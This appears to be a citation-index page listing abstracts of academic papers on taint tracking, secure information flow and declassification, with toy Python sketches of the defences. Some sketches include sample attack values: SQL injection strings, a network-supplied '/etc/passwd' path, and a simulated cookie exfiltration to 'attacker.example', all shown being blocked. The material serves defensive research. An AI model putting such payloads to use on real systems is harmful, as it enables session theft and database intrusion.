TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones
, 2010
"... Today’s smartphone operating systems fail to provide users with adequate control and visibility into how third-party applications use their private data. We present TaintDroid, an efficient, system-wide dynamic taint tracking and analysis system for the popular Android platform that can simultaneous ..."
Abstract
-
Cited by 527 (26 self)
- Add to MetaCart
Today’s smartphone operating systems fail to provide users with adequate control and visibility into how third-party applications use their private data. We present TaintDroid, an efficient, system-wide dynamic taint tracking and analysis system for the popular Android platform that can simultaneously track multiple sources of sensitive data. TaintDroid’s efficiency to perform real-time analysis stems from its novel system design that leverages the mobile platform’s virtualized system architecture. TaintDroid incurs only 14% performance overhead on a CPU-bound micro-benchmark with little, if any, perceivable overhead when running third-party applications. We use TaintDroid to study the behavior of 30 popular third-party Android applications and find several instances of misuse of users’ private information. We believe that TaintDroid is the first working prototype demonstrating that dynamic taint tracking and analysis provides informed use of third-party applications in existing smartphone operating systems.
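The abstract describes system-wide taint tracking only at a high level. Below is a minimal sketch, in Python, of the general pattern the paper builds on: tag data at a source, propagate tags through operations, and check them at a sink. The class, tag names, and functions are invented for illustration; TaintDroid itself implements this inside the Dalvik VM at the instruction level.

```python
# Toy sketch of dynamic taint tracking (illustrative only, not TaintDroid's
# Dalvik-level implementation). Tags are a bitvector so multiple sources of
# sensitive data can be tracked simultaneously.
TAINT_LOCATION = 1 << 0   # hypothetical taint-source labels
TAINT_IMEI     = 1 << 1

class Tainted:
    """A value paired with a bitvector of taint tags."""
    def __init__(self, value, tag=0):
        self.value, self.tag = value, tag

    def __add__(self, other):
        # Propagation rule: the result carries the union of the inputs' tags.
        o_val = other.value if isinstance(other, Tainted) else other
        o_tag = other.tag if isinstance(other, Tainted) else 0
        return Tainted(self.value + o_val, self.tag | o_tag)

def network_send(data):
    # Taint sink: report tagged data that is about to leave the device.
    if isinstance(data, Tainted) and data.tag:
        print(f"ALERT: tainted data (tags={data.tag:#x}) sent to network")

imei = Tainted("356938035643809", TAINT_IMEI)  # taint source
msg = Tainted("id=") + imei                    # the tag propagates through +
network_send(msg)                              # the sink reports the flow
```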
Securing Web Application Code by Static Analysis and Runtime Protection
, 2004
"... Security remains a major roadblock to universal acceptance of the Web for many kinds of transactions, especially since the recent sharp increase in remotely exploitable vulnerabilities has been attributed to Web application bugs. Many verification tools are discovering previously unknown vulnerabili ..."
Abstract
-
Cited by 234 (2 self)
- Add to MetaCart
(Show Context)
Security remains a major roadblock to universal acceptance of the Web for many kinds of transactions, especially since the recent sharp increase in remotely exploitable vulnerabilities has been attributed to Web application bugs. Many verification tools are discovering previously unknown vulnerabilities in legacy C programs, raising hopes that the same success can be achieved with Web applications. In this paper, we describe a sound and holistic approach to ensuring Web application security. Viewing Web application vulnerabilities as a secure information flow problem, we created a lattice-based static analysis algorithm derived from type systems and typestate, and addressed its soundness. During the analysis, sections of code considered vulnerable are instrumented with runtime guards, thus securing Web applications in the absence of user intervention. With sufficient annotations, runtime overhead can be reduced to zero. We also created a tool named WebSSARI (Web application Security by Static Analysis and Runtime Inspection) to test our algorithm, and used it to verify 230 open-source Web application projects on SourceForge.net, which were selected to represent projects of different maturity, popularity, and scale. 69 contained vulnerabilities and their developers were notified. 38 projects acknowledged our findings and stated their plans to provide patches. Our statistics also show that static analysis reduced potential runtime overhead by 98.4%.
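As a rough illustration of the runtime-guard idea described above, the sketch below (in Python, although WebSSARI targets PHP; the guard functions are hypothetical) wraps a sink that static analysis could not prove safe with a sanitizing check. Sinks proven safe are left uninstrumented, which is how sufficient annotations can drive the runtime overhead toward zero.

```python
# Illustrative runtime guards inserted at sinks the static analysis flags as
# potentially tainted (not WebSSARI's actual instrumentation).
import html

def guard_sql(value: str) -> str:
    # Hypothetical guard for database sinks: reject common SQL metacharacters.
    if any(c in value for c in ("'", '"', ';')) or "--" in value:
        raise ValueError("untrusted input rejected by runtime guard")
    return value

def guard_html(value: str) -> str:
    # Hypothetical guard for output sinks: escape before echoing to a page.
    return html.escape(value)

def build_query(name_from_request: str) -> str:
    # The static phase would flag this concatenation as tainted, so the
    # instrumented version routes the input through a guard first.
    return "SELECT * FROM users WHERE name = '" + guard_sql(name_from_request) + "'"

print(build_query("alice"))        # passes the guard
# build_query("x' OR '1'='1")      # would raise at the guard
```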
Taint-enhanced policy enforcement: A practical approach to defeat a wide range of attacks
- In the Proc. of the 15th USENIX Security Symp
, 2006
"... Policy-based confinement, employed in SELinux and specification-based intrusion detection systems, is a popular approach for defending against exploitation of vulnerabilities in benign software. Conventional access control policies employed in these approaches are effective in detecting privilege es ..."
Abstract
-
Cited by 202 (10 self)
- Add to MetaCart
(Show Context)
Policy-based confinement, employed in SELinux and specification-based intrusion detection systems, is a popular approach for defending against exploitation of vulnerabilities in benign software. Conventional access control policies employed in these approaches are effective in detecting privilege escalation attacks. However, they are unable to detect attacks that “hijack” legitimate access privileges granted to a program, e.g., an attack that subverts an FTP server to download the password file. (Note that an FTP server would normally need to access the password file for performing user authentication.) Some of the common attack types reported today, such as SQL injection and cross-site scripting, involve such subversion of legitimate access privileges. In this paper, we present a new approach to strengthen policy enforcement by augmenting security policies with information about the trustworthiness of data used in security-sensitive operations. We evaluated this technique using 9 available exploits involving several popular software packages containing the above types of vulnerabilities. Our technique successfully defeated these exploits.
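A minimal sketch of augmenting a policy with data trustworthiness, assuming an invented policy and taint representation rather than the paper's actual policy language: the same file access is permitted when driven by internal data but denied when the file name is network-tainted.

```python
# Taint-enhanced policy check (illustrative only): the access decision also
# consults whether the data driving the operation came from the network.
SENSITIVE_FILES = {"/etc/passwd", "/etc/shadow"}   # hypothetical policy

class TStr(str):
    """String subclass carrying a 'tainted' flag (set for network input)."""
    tainted = False

def from_network(data: str) -> TStr:
    s = TStr(data)
    s.tainted = True
    return s

def checked_open(path: str, mode: str = "r"):
    # Plain access control must allow the FTP server to read /etc/passwd for
    # authentication; the taint check blocks the case where the *name* of the
    # sensitive file was supplied by the remote client.
    if path in SENSITIVE_FILES and getattr(path, "tainted", False):
        raise PermissionError("network-tainted data used to name a sensitive file")
    return open(path, mode)

# checked_open("/etc/passwd")                    # internal access: allowed
# checked_open(from_network("/etc/passwd"))      # subverted access: rejected
```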
Automatically hardening web applications using precise tainting
- In 20th IFIP International Information Security Conference
, 2005
"... Most web applications contain security vulnerabilities. The simple and natural ways of creating a web application are prone to SQL injection attacks and cross-site scripting attacks (among other less common vulnerabilities). In response, many tools have been developed for detecting or mitigating com ..."
Abstract
-
Cited by 191 (3 self)
- Add to MetaCart
(Show Context)
Most web applications contain security vulnerabilities. The simple and natural ways of creating a web application are prone to SQL injection attacks and cross-site scripting attacks (among other less common vulnerabilities). In response, many tools have been developed for detecting or mitigating common web application vulnerabilities. Existing techniques either require effort from the site developer or are prone to false positives. This paper presents a fully automated approach to securely hardening web applications. It is based on precisely tracking the taintedness of data and checking for dangerous content only in the parts of commands and output that came from untrustworthy sources. Unlike previous work in which everything derived from tainted input is tainted, our approach precisely tracks taintedness within data values. We describe our results and prototype implementation on the predominant LAMP (Linux, Apache, MySQL, PHP) platform.
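The following toy sketch illustrates what “precise tainting” means in contrast to value-level tainting: taint is kept per character, so only user-supplied substrings are checked for dangerous content. The classes and checks are invented for the example; the actual prototype instruments the PHP interpreter.

```python
# Character-level taint tracking (illustrative only). Quotes written by the
# developer are untainted and never trigger the check; only user-supplied
# characters are inspected at the SQL sink.
class PString:
    def __init__(self, text, taint=None):
        self.text = text
        # One boolean per character: True means user-supplied.
        self.taint = taint if taint is not None else [False] * len(text)

    def __add__(self, other):
        return PString(self.text + other.text, self.taint + other.taint)

def user_input(text):                      # every character is tainted
    return PString(text, [True] * len(text))

def check_sql(ps: PString):
    for ch, tainted in zip(ps.text, ps.taint):
        if tainted and ch in "'\";":
            raise ValueError("tainted SQL metacharacter: " + repr(ch))

query = PString("SELECT * FROM users WHERE name = '") + user_input("alice") + PString("'")
check_sql(query)   # passes; would fail for user_input("a' OR '1'='1")
```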
Robust Declassification
- in Proc. IEEE Computer Security Foundations Workshop
, 2001
"... Security properties based on information flow, such as noninterference, provide strong guarantees that confidentiality is maintained. However, programs often need to leak some amount of confidential information in order to serve their intended purpose, and thus violate noninterference. Real systems ..."
Abstract
-
Cited by 165 (26 self)
- Add to MetaCart
(Show Context)
Security properties based on information flow, such as noninterference, provide strong guarantees that confidentiality is maintained. However, programs often need to leak some amount of confidential information in order to serve their intended purpose, and thus violate noninterference. Real systems that control information flow often include mechanisms for downgrading or declassifying information; however, declassification can easily result in the unexpected release of confidential information.
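A standard example of why declassification is needed at all (not taken from the paper, which works with formal program equivalences): a password check must release one bit about the secret and therefore violates strict noninterference, yet the release is intentional and should not be widenable by an attacker.

```python
# The classic one-bit declassification: the boolean result is public (low)
# output that depends on confidential (high) data. Illustrative only.
import hmac

SECRET_PASSWORD = "hunter2"        # confidential (high) data

def check_password(guess: str) -> bool:
    # Intentional, limited release: whether the guess matched.
    return hmac.compare_digest(SECRET_PASSWORD, guess)

print(check_password("letmein"))   # False: one bit of the secret is released
# Robust declassification asks that an attacker who can influence code or data
# cannot widen this release beyond the intended one bit.
```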
Separating agreement from execution for byzantine fault tolerant services
- In Proc. SOSP
, 2003
"... We describe a new architecture for Byzantine fault tolerant state machine replication that separates agreement that orders requests from execution that processes requests. This separation yields two fundamental and practically significant advantages over previous architectures. First, it reduces rep ..."
Abstract
-
Cited by 161 (18 self)
- Add to MetaCart
(Show Context)
We describe a new architecture for Byzantine fault tolerant state machine replication that separates agreement that orders requests from execution that processes requests. This separation yields two fundamental and practically significant advantages over previous architectures. First, it reduces replication costs because the new architecture can tolerate faults in up to half of the state machine replicas that execute requests. Previous systems can tolerate faults in at most a third of the combined agreement/state machine replicas. Second, separating agreement from execution allows a general privacy firewall architecture to protect confidentiality through replication. In contrast, replication in previous systems hurts confidentiality because exploiting the weakest replica can be sufficient to compromise the system. We have constructed a prototype and evaluated it running both microbenchmarks and an NFS server. Overall, we find that the architecture adds modest latencies to unreplicated systems and that its performance is competitive with existing Byzantine fault tolerant systems.
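The replication-cost claim can be made concrete with the usual Byzantine fault tolerance bounds, stated here as an assumption for illustration:

```latex
% Replica counts implied by the abstract: tolerating f Byzantine faults needs
% 3f+1 agreement replicas but only 2f+1 execution replicas.
\[
  n_{\text{agreement}} \ge 3f + 1, \qquad n_{\text{execution}} \ge 2f + 1 .
\]
```

For f = 1 this means three execution replicas instead of four full state-machine replicas, with the four agreement nodes being comparatively lightweight because they only order requests.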
Dimensions and Principles of Declassification
, 2005
"... Computing systems often deliberately release (or declassify) sensitive information. A principal security concern for systems permitting information release is whether this release is safe: is it possible that the attacker compromises the information release mechanism and extracts more secret informa ..."
Abstract
-
Cited by 142 (16 self)
- Add to MetaCart
Computing systems often deliberately release (or declassify) sensitive information. A principal security concern for systems permitting information release is whether this release is safe: is it possible that the attacker compromises the information release mechanism and extracts more secret information than intended? While the security community has recognised the importance of the problem, the state-of-the-art in information release is, unfortunately, a number of approaches with somewhat unconnected semantic goals. We provide a road map of the main directions of current research, by classifying the basic goals according to what information is released, who releases information, where in the system information is released, and when information can be released. With a general declassification framework as a long-term goal, we identify some prudent principles of declassification. These principles shed light on existing definitions and may also serve as useful "sanity checks" for emerging models.
All you ever wanted to know about dynamic taint analysis and forward symbolic execution (but might have been afraid to ask)
- In Proceedings of the IEEE Symposium on Security and Privacy
, 2010
"... Abstract—Dynamic taint analysis and forward symbolic execution are quickly becoming staple techniques in security analyses. Example applications of dynamic taint analysis and forward symbolic execution include malware analysis, input filter generation, test case generation, and vulnerability discove ..."
Abstract
-
Cited by 106 (5 self)
- Add to MetaCart
(Show Context)
Dynamic taint analysis and forward symbolic execution are quickly becoming staple techniques in security analyses. Example applications of dynamic taint analysis and forward symbolic execution include malware analysis, input filter generation, test case generation, and vulnerability discovery. Despite the widespread usage of these two techniques, there has been little effort to formally define the algorithms and summarize the critical issues that arise when these techniques are used in typical security contexts. The contributions of this paper are two-fold. First, we precisely describe the algorithms for dynamic taint analysis and forward symbolic execution as extensions to the run-time semantics of a general language. Second, we highlight important implementation choices, common pitfalls, and considerations when using these techniques in a security context. Keywords: taint analysis, symbolic execution, dynamic analysis.
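To make the “run-time semantics” framing concrete, here is a toy forward symbolic execution of a tiny expression language in Python. It is only a sketch of the general idea, not the paper's SimpIL language or its formal rules.

```python
# Forward symbolic evaluation of a toy expression language: concrete values
# are folded, while expressions touching symbolic inputs build up formulas.
from dataclasses import dataclass

@dataclass
class Sym:
    name: str               # a symbolic (attacker-controlled) input variable

def sym_eval(expr, env):
    """Evaluate an expression tree to a concrete int or a formula string."""
    op, *args = expr
    if op == "const":
        return args[0]
    if op == "var":
        return env[args[0]]
    left, right = (sym_eval(a, env) for a in args)
    if isinstance(left, int) and isinstance(right, int):
        return {"+": left + right, "*": left * right}[op]     # concrete folding
    fmt = lambda v: v.name if isinstance(v, Sym) else str(v)
    return f"({fmt(left)} {op} {fmt(right)})"                  # symbolic formula

env = {"x": Sym("x"), "y": 3}          # x is symbolic input, y is concrete
expr = ("+", ("*", ("var", "x"), ("const", 2)), ("var", "y"))
print(sym_eval(expr, env))             # ((x * 2) + 3); handed to a solver in practice
```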
Cross-Site Scripting Prevention with Dynamic Data Tainting and Static Analysis
- In Proceedings of the Network and Distributed System Security Symposium (NDSS ’07)
, 2007
"... Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). ..."
Abstract
-
Cited by 104 (2 self)
- Add to MetaCart
(Show Context)
Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). Currently, most approaches attempt to prevent XSS on the server side by inspecting and modifying the data that is exchanged between the web application and the user. Unfortunately, it is often the case that vulnerable applications are not fixed for a considerable amount of time, leaving the users vulnerable to attacks. The solution presented in this paper stops XSS attacks on the client side by tracking the flow of sensitive information inside the web browser. If sensitive information is about to be transferred to a third party, the user can decide if this should be permitted or not. As a result, the user has an additional protection layer when surfing the web, without solely depending on the security of the web application.
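The client-side mechanism can be pictured with the following Python simulation (the function names and origins are invented for the example; the real system tracks taint inside the browser's JavaScript engine): sensitive values are tainted at the source, and a cross-origin transfer of tainted data is stopped so the user can decide.

```python
# Simulated client-side data tainting: a third-party request carrying
# cookie-derived data is intercepted before it leaves the "browser".
from urllib.parse import urlparse

class Tainted(str):
    """Marker type for values derived from sensitive browser state."""

def read_cookie() -> Tainted:
    return Tainted("SESSIONID=deadbeef")                  # taint source

def send_request(url: str, body: str, page_origin: str):
    third_party = urlparse(url).netloc != page_origin     # cross-origin check
    if third_party and isinstance(body, Tainted):
        raise PermissionError(f"tainted data would flow to {url}; ask the user")
    print("request allowed")

cookie = read_cookie()
try:
    send_request("https://attacker.example/steal", cookie, page_origin="shop.example")
except PermissionError as blocked:
    print("blocked:", blocked)
```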
A Theorem Proving Approach to Analysis of Secure Information Flow
, 2003
"... Most attempts at analysing secure information flow in programs are based on domain-specific logics. Though computationally feasible, these approaches suffer from the need for abstraction and the high cost of building dedicated tools for real programming languages. We recast the information flow prob ..."
Abstract
-
Cited by 104 (10 self)
- Add to MetaCart
Most attempts at analysing secure information flow in programs are based on domain-specific logics. Though computationally feasible, these approaches suffer from the need for abstraction and the high cost of building dedicated tools for real programming languages. We recast the information flow problem in a general program logic rather than a problem-specific one. We investigate the feasibility of this approach by showing how a general-purpose tool for software verification can be used to perform information flow analyses. We are able to handle phenomena like method calls, loops, and object types for the target language Java Card. We are also able to prove insecurity of programs.
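One common way to express information flow as an obligation for a general-purpose verifier is self-composition, shown here as an illustrative assumption rather than the paper's exact dynamic-logic formulation:

```latex
% Noninterference as a verification condition over two copies of P, whose
% high (secret) and low (public) variables are renamed apart:
\[
  \{\, l_1 = l_2 \,\}\;\; P[h_1, l_1]\,;\, P[h_2, l_2] \;\;\{\, l_1 = l_2 \,\}
\]
```

If equal low inputs force equal low outputs regardless of the high inputs h, no information flows from the secrets to the public results, so the property can be discharged by an off-the-shelf program verifier.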